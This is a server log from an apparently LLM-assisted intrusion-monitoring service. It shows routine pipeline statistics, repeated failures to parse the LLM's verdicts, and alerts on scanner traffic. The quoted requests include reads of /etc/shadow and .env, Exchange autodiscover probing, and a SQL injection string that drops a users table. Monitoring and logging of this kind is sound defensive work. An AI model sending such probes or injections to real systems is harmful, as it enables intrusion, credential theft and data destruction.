Mar 19 23:07:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:22.975790 [observer] Patterns: hash=118 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:07:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:52.974818 [observer] Pipeline: processed=138 pattern_hits=120 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:07:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:52.975036 [observer] Patterns: hash=120 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:08:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:22.994841 [observer] Pipeline: processed=140 pattern_hits=122 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:08:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:22.994868 [observer] Patterns: hash=122 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:08:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:52.974956 [observer] Pipeline: processed=144 pattern_hits=126 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:08:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:52.974980 [observer] Patterns: hash=126 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:09:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:22.987585 [observer] Pipeline: processed=146 pattern_hits=128 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:09:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:22.987608 [observer] Patterns: hash=128 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:09:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:52.978665 [observer] Pipeline: processed=150 pattern_hits=132 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:09:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:52.978695 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:10:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:22.974936 [observer] Pipeline: processed=152 pattern_hits=134 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:10:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:22.974961 [observer] Patterns: hash=134 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:10:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:52.974909 [observer] Pipeline: processed=158 pattern_hits=140 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:10:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:52.974933 [observer] Patterns: hash=140 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:11:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:22.976981 [observer] Pipeline: processed=160 pattern_hits=142 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:11:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:22.977009 [observer] Patterns: hash=142 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:11:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:52.990276 [observer] Pipeline: processed=162 pattern_hits=144 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:11:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:52.990309 [observer] Patterns: hash=144 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:12:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:22.975742 [observer] Pipeline: processed=166 pattern_hits=148 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:12:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:22.975767 [observer] Patterns: hash=148 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:12:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:52.988437 [observer] Pipeline: processed=168 pattern_hits=150 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:12:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:52.988460 [observer] Patterns: hash=150 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:13:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:22.974866 [observer] Pipeline: processed=172 pattern_hits=154 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:13:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:22.974901 [observer] Patterns: hash=154 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:13:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:52.985915 [observer] Pipeline: processed=174 pattern_hits=156 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:13:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:52.985944 [observer] Patterns: hash=156 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:14:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:22.974965 [observer] Pipeline: processed=178 pattern_hits=160 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:14:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:22.974988 [observer] Patterns: hash=160 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:14:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:52.975018 [observer] Pipeline: processed=180 pattern_hits=162 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:14:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:52.975045 [observer] Patterns: hash=162 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:15:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:22.975842 [observer] Pipeline: processed=182 pattern_hits=164 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:15:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:22.975866 [observer] Patterns: hash=164 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:15:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:52.975937 [observer] Pipeline: processed=188 pattern_hits=170 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:15:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:52.975966 [observer] Patterns: hash=170 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:16:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:22.976037 [observer] Pipeline: processed=190 pattern_hits=172 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:16:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:22.976062 [observer] Patterns: hash=172 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:16:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:52.975075 [observer] Pipeline: processed=194 pattern_hits=176 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:16:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:52.975098 [observer] Patterns: hash=176 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:17:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:22.975863 [observer] Pipeline: processed=196 pattern_hits=178 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:17:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:22.975887 [observer] Patterns: hash=178 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:17:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:52.975490 [observer] Pipeline: processed=200 pattern_hits=182 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:17:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:52.975512 [observer] Patterns: hash=182 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:18:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:22.976236 [observer] Pipeline: processed=202 pattern_hits=184 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:18:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:22.976260 [observer] Patterns: hash=184 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:18:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:52.992821 [observer] Pipeline: processed=204 pattern_hits=186 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:18:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:52.992845 [observer] Patterns: hash=186 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:19:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:22.976495 [observer] Pipeline: processed=208 pattern_hits=190 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:19:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:22.976519 [observer] Patterns: hash=190 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:19:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:52.989516 [observer] Pipeline: processed=210 pattern_hits=192 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:19:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:52.989544 [observer] Patterns: hash=192 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:20:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:22.975061 [observer] Pipeline: processed=214 pattern_hits=196 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:20:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:22.975187 [observer] Patterns: hash=196 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:20:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:52.976782 [observer] Pipeline: processed=218 pattern_hits=200 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:20:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:52.976813 [observer] Patterns: hash=200 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:21:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:22.975516 [observer] Pipeline: processed=222 pattern_hits=204 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:21:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:22.975542 [observer] Patterns: hash=204 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:21:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:52.977043 [observer] Pipeline: processed=224 pattern_hits=206 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:21:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:52.977070 [observer] Patterns: hash=206 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:22:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:22.991339 [observer] Pipeline: processed=226 pattern_hits=208 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:22:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:22.991361 [observer] Patterns: hash=208 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:22:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:52.976285 [observer] Pipeline: processed=230 pattern_hits=212 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:22:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:52.976322 [observer] Patterns: hash=212 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:23:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:22.988295 [observer] Pipeline: processed=233 pattern_hits=214 llm_calls=18 llm_errors=17 learned=0
Mar 19 23:23:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:22.988327 [observer] Patterns: hash=214 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=19
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257827 [llm] Failed to parse verdict from:
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257864 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257875 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:23:09.463883617Z 2026/03/19 23:23:09 [error] 422#422: *742244 open() "/usr/share/nginx...
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257925 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:23:09.463942106Z 31.57.41.45 - - [19/Mar/2026:23:23:09 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like ...
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231885 [llm] Failed to parse verdict from:
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231922 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231933 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:23:10.245901415Z 31.57.41.45 - - [19/Mar/2026:23:23:10 +0000] "54.200.221.0" "POST / H...
Mar 19 23:23:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:52.975741 [observer] Pipeline: processed=239 pattern_hits=219 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:23:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:52.975769 [observer] Patterns: hash=219 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:24:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:22.977060 [observer] Pipeline: processed=241 pattern_hits=221 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:24:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:22.977085 [observer] Patterns: hash=221 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:24:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:52.976728 [observer] Pipeline: processed=245 pattern_hits=225 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:24:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:52.976759 [observer] Patterns: hash=225 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:25:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:22.976811 [observer] Pipeline: processed=247 pattern_hits=227 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:25:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:22.976834 [observer] Patterns: hash=227 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:25:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:52.990526 [observer] Pipeline: processed=249 pattern_hits=229 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:25:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:52.990550 [observer] Patterns: hash=229 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:26:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:22.976422 [observer] Pipeline: processed=255 pattern_hits=235 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:26:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:22.976453 [observer] Patterns: hash=235 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:26:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:52.988609 [observer] Pipeline: processed=257 pattern_hits=237 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:26:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:52.988636 [observer] Patterns: hash=237 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:27:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:22.976452 [observer] Pipeline: processed=261 pattern_hits=241 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:27:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:22.976476 [observer] Patterns: hash=241 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:27:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:52.975146 [observer] Pipeline: processed=265 pattern_hits=243 llm_calls=21 llm_errors=19 learned=0
Mar 19 23:27:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:52.975194 [observer] Patterns: hash=243 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=22
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461304 [llm] Failed to parse verdict from:
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461355 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461366 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:27:47.694186554Z 98.152.173.124 - - [19/Mar/2026:23:27:47 +0000] "api.admin.kovicloud....
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628547 [llm] Failed to parse verdict from:
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628586 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628595 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:27:47.694326428Z 10.0.1.9 - - [19/Mar/2026:23:27:47 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706637 [llm] Failed to parse verdict from:
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706670 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706679 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:27:52.287269071Z 10.0.1.9 - - [19/Mar/2026:23:27:52 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150199 [llm] Failed to parse verdict from:
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150233 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150241 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:27:52.287566903Z 98.152.173.124 - - [19/Mar/2026:23:27:52 +0000] "api.admin.kovicloud....
Mar 19 23:28:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:22.975810 [observer] Pipeline: processed=271 pattern_hits=247 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:28:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:22.975837 [observer] Patterns: hash=247 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:28:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:52.976270 [observer] Pipeline: processed=273 pattern_hits=249 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:28:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:52.976302 [observer] Patterns: hash=249 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:29:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:22.989710 [observer] Pipeline: processed=275 pattern_hits=251 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:29:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:22.989736 [observer] Patterns: hash=251 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:29:45 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:45.937643 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Shadow password file access Line=2026-03-19T23:29:45.937343066Z 10.0.1.9 - - [19/Mar/2026:23:29:45 +0000] "GET /etc/shadow HTTP/1.0" 404 6603 "-" "curl/8.5.0" "98.152.173.124"
Mar 19 23:29:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:52.976584 [observer] Pipeline: processed=280 pattern_hits=254 llm_calls=25 llm_errors=23 learned=0
Mar 19 23:29:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:52.976616 [observer] Patterns: hash=253 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=26
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541559 [llm] Failed to parse verdict from:
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541603 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541614 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:45.936915038Z 98.152.173.124 - - [19/Mar/2026:23:29:45 +0000] "api.admin.kovicloud....
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586791 [llm] Failed to parse verdict from:
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586830 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586839 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:46.751428478Z 10.0.1.9 - - [19/Mar/2026:23:29:46 +0000] "GET /?id=1;DROP+TABLE+user...
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005863 [llm] Failed to parse verdict from:
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005898 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005907 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:46.752130725Z 98.152.173.124 - - [19/Mar/2026:23:29:46 +0000] "api.admin.kovicloud....
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.976287 [observer] Pipeline: processed=284 pattern_hits=255 llm_calls=28 llm_errors=26 learned=0
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.976318 [observer] Patterns: hash=254 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=29
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571483 [llm] Failed to parse verdict from:
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571520 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571531 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:46.946096996Z 10.0.1.9 - - [19/Mar/2026:23:29:46 +0000] "GET /wp-admin/install.php ...
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528139 [llm] Failed to parse verdict from:
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528192 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528203 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:46.946097849Z 98.152.173.124 - - [19/Mar/2026:23:29:46 +0000] "api.admin.kovicloud....
Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829777 [llm] Failed to parse verdict from:
Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829819 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829828 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.099627580Z 2026/03/19 23:29:47 [error] 10#10: *4712 access forbidden by rule, cl...
Mar 19 23:30:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:52.977624 [observer] Pipeline: processed=288 pattern_hits=256 llm_calls=31 llm_errors=29 learned=0
Mar 19 23:30:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:52.977652 [observer] Patterns: hash=255 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=32
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293375 [llm] Failed to parse verdict from:
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293410 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293419 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:47.099819255Z 98.152.173.124 - - [19/Mar/2026:23:29:47 +0000] "api.admin.kovicloud....
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887768 [llm] Failed to parse verdict from:
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887800 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887809 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.099998115Z 10.0.1.9 - - [19/Mar/2026:23:29:47 +0000] "GET /.env HTTP/1.0" 403 14...
Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604876 [llm] Failed to parse verdict from:
Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604915 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604925 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:47.255063079Z 98.152.173.124 - - [19/Mar/2026:23:29:47 +0000] "api.admin.kovicloud....
Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737063 [llm] Failed to parse verdict from:
Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737101 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
